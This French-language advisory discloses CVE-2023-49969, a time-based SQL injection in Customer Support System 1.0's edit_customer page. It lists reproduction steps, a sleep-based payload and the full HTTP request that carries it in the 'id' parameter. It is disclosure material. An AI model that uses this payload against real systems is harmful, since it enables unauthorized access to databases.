
Système de support client 1.0 - Vulnérabilité d'injection SQL dans edit_customer via le paramètre URL "id"
Description : Une vulnérabilité d'injection SQL existe dans la version 1 du Système de Support Client. Un attaquant malveillant peut exécuter des commandes SQL sur la base de données MySQL en manipulant le paramètre 'id' de l'URL lors de l'édition d'un client.
Version du produit vulnérable : Customer Support System 1.0
Auteur du CVE : Geraldo Alcântara
Date : 28/11/2023
Confirmé le : 19/12/2023
CVE : CVE-2023-49969
Testé sur : Windows
1- Connectez-vous à l'application.
2- Accédez à la page customer_list, cliquez sur le bouton 'Action' et sélectionnez 'Edit'.
3- Le paramètre 'id' sera passé, permettant l'insertion d'une charge utile malveillante.
payload : (select*from(select(sleep(5)))a)
GET /customer_support/index.php?page=edit_customer&id=(select*from(select(sleep(5)))a HTTP/1.1
Host: 192.168.68.182
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Connection: close
Referer: http://192.168.68.182/customer_support/index.php?page=customer_list
Cookie: PHPSESSID=arlocktakq815fq1lpm5fjml9n
Upgrade-Insecure-Requests: 1
Découvreur(s)/Crédits :
Geraldo Alcântara